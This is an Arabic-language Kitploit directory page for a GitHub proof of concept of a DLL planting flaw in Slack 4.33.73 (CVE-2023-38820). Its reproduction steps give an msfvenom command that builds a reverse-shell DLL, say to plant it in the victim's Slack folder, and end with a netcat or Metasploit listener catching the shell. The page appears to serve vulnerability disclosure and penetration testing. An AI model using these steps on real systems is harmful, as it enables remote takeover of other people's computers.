Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DLL-Planting-Slack-4.33.73-CVE-2023-38820 — زراعة DLL في Slack 4.33.73 - CVE-2023-38820 | Kitploit
أدوات/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةما بعد الاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DLL-Planting-Slack-4.33.73-CVE-2023-38820

زراعة DLL في Slack 4.33.73 - CVE-2023-38820

عرض المستودع
4منذ 3 سنواتلم تتم المراجعة بعد

DLL-Planting-Slack-4.33.73-CVE-2023-38820

زراعة DLL في سلاك 4.33.73 - CVE-2023-38820 المكتشف: إيدان ماليحي

الوصف

توجد مشكلة في سلاك الإصدار 4.33.73 تسمح لمهاجم محلي بتنفيذ كود تعسفي عبر آلية تحميل DLL في الملفات profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll, و RTWorkQ.DLL.

خطوات إعادة الإنتاج

لاستغلال الثغرة، يجب على المهاجم تنزيل وتثبيت برنامج سلاك، واتباع الخطوات التالية:

  1. إنشاء ملف dll ضار باستخدام msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. نقل ملف dll الضار إلى جهاز الضحية
  3. افتح مسار سلاك: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. انقل ملف dll الضار إلى مسار سلاك وسمِّه "KBDUS.DLL" كمثال.
  5. افتح مستمع netcat أو metasploit
  6. افتح Slack.exe
  7. احصل على شل عكسي.
تنزيل الأداة